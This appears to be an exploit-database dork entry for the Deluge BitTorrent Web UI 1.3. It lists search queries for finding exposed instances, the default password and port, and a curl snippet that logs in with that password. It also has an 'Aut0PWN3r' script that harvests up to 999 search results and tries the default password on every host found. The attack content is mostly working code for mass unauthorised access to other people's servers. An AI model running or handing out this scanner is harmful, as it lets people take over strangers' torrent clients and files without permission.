Deluge – Web UI (BitTorrent Client – Download/Upload/Seed/Control/File Explorer) v1+v2

  • 日期:2018-04-03
  • 类别:
  • 作者:Pancaker
  • 语法:Deluge – Web UI (BitTorrent Client – Download/Upload/Seed/Control/File Explorer) v1+v2
  • GoogleDork v1 ~ intitle:"Deluge: Web UI 1.3"
    GoogleDork v2 ~ intitle:"Deluge: Web UI 1.3" Filters. Status; Details; Files; Peers; Options. Downloaded: Uploaded:

    Default password: deluge ~ https://dev.deluge-torrent.org/wiki/UserGuide/ThinClient#ClientSetup1
    Default port: 8112 ~ https://dev.deluge-torrent.org/wiki/UserGuide/ThinClient#ClientSetup1

    - - -

    ## Bash


    url="http://target.com:8112/json"
    pass="deluge"

    req=$( curl \
    -s \
    --header 'Content-Type: application/json' \
    --data '{"method":"auth.login","params":["'${pass}'"],"id":1}' \
    --compressed \
    "${url}" )

    echo ${req} | grep -q '"result": true' \
    && echo 'w000h000!' \
    || echo 'b00'

    - - -

    ## Aut0PWN3r

    //brew install googler//


    googler \
    --count 999 \
    --unfilter \
    --json \
    --noprompt \
    'intitle:"Deluge: Web UI 1.3" -exploit -vulnerability' \
    | awk -F'"' '/"url"/ {print $4}' \
    > /tmp/results.txt

    for x in $( cat /tmp/results.txt ); do
    curl \
    -s \
    --header 'Content-Type: application/json' \
    --data '{"method":"auth.login","params":["deluge"],"id":1}' \
    --compressed \
    --max-time 5 \
    "${x}/json" \
    | grep -q true \
    && echo "[*] w000h000! ~ ${x}" \
    || echo "[-] b00 ~ ${x}"
    done

    - - -

    ## Other Work

    - ruTorrent ~ https://www.exploit-db.com/ghdb/4652/
    - Deluge v1+v2 (+autopwner) ~ https://www.exploit-db.com/ghdb/4741/
    - Deluge v3 ~ https://www.exploit-db.com/ghdb/4742/